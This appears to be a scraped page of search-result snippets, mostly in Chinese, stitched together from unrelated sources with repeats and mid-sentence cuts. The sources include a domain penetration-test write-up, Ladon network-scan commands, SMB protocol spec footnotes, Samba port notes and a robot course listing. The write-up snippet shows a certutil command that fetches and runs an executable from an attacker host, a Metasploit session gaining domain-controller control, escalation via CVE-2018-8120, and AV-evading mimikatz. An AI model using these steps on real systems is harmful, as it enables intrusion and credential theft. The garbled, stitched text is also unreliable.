certutil.exe-urlcache-split-fhttp://192.168.52.143/6666.exe&6666.exe 成功执行,这时候在138机器(即DC-win2008)上开启6666端口监听 在msf上个运行blin_tcp来获取回话 成功获取域控权限,后续提权 使用CVE-2018-8120提权,成功提到系统权限,这里我思考了一下用MS14-068应该也能够提权成功 成功提权,上免杀mimikatz...
certutil.exe-urlcache-split-fhttp://192.168.52.143/6666.exe&6666.exe 成功执行,这时候在138机器(即DC-win2008)上开启6666端口监听 在msf上个运行blin_tcp来获取回话 成功获取域控权限,后续提权 使用CVE-2018-8120提权,成功提到系统权限,这里我思考了一下用MS14-068应该也能够提权成功 成功提权,上免杀mimikatz...
138 Smb协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 SmbInfo139 Wmi协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 WmiInfo140 Mssql协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 MssqlInfo141 Winrm协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 WinrmInfo...
<138> Section 3.2.4.2.2.2: Windows 10 v1809 and prior and Windows Server v1809 and prior do not support SMB2_NETNAME_NEGOTIATE_CONTEXT_ID. <139> Section 3.2.4.2.2.2: Windows 11 operating system and later and Windows Server 2022 operating system and later initialize with AES-GMAC(0x0002...
<138> Section 3.2.4.2.2.2: Windows 10 v1809 and prior and Windows Server v1809 and prior do not support SMB2_NETNAME_NEGOTIATE_CONTEXT_ID. <139> Section 3.2.4.2.2.2: Windows 11 operating system and later and Windows Server 2022 operating system and later initialize with AES-GMAC(0x0002)...
138(UDP): NetBIOS数据报服务 139(TCP): 文件和打印共享 389(TCP): 用于LDAP 445(TCP): NetBIOS服务在windows 2000及以后使用此端口 901(TCP): 用于SWAT, 网页管理Samba 如果不想关闭防火墙的话, 就要在CentOS中放开Samba使用到的TCP端口号复制代码 ...
138. 139. 140. 141. mount -t nfs mount.nfs mount -t cifs mount.cifs ###扩展介绍 一、samba介绍 SMB(Server Message Block)协议实现文件共享,也称为CIFS(Common Internet File System ) 是Windows和类Unix系统之间共享文件的一种协议 客户端主要是Windows;支持多节点同时挂载以及并发写入 主要用于window...
<138> Section 3.2.4.2.2.2: Windows 10 v1809 and prior and Windows Server v1809 and prior do not support SMB2_NETNAME_NEGOTIATE_CONTEXT_ID. <139> Section 3.2.4.2.2.2: Windows 11 operating system and later and Windows Server 2022 operating system and later initialize with AES-GMAC(0x000...
50 14 第14课 虚拟信号创建(基于5.XX系统) 0:4:33 15 第15课 虚拟信号创建(基于6.XX系统) 0:3:46 16 第16课 信号逻辑连接 0:7:16 17 第17课 IO程序调用 0:6:32 18 第18课 备份文件说明(5.xx系统) 0:7:20 19 第19课 路径恢复功能 0:14:44 20 第20课 关节轴限位设置 0:5:9 21 第...
138 Smb协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 SmbInfo139 Wmi协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 WmiInfo140 Mssql协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 MssqlInfo141 Winrm协议探测Windows版本、主机名、域Ladon 192.168.1.8/24 WinrmInfo...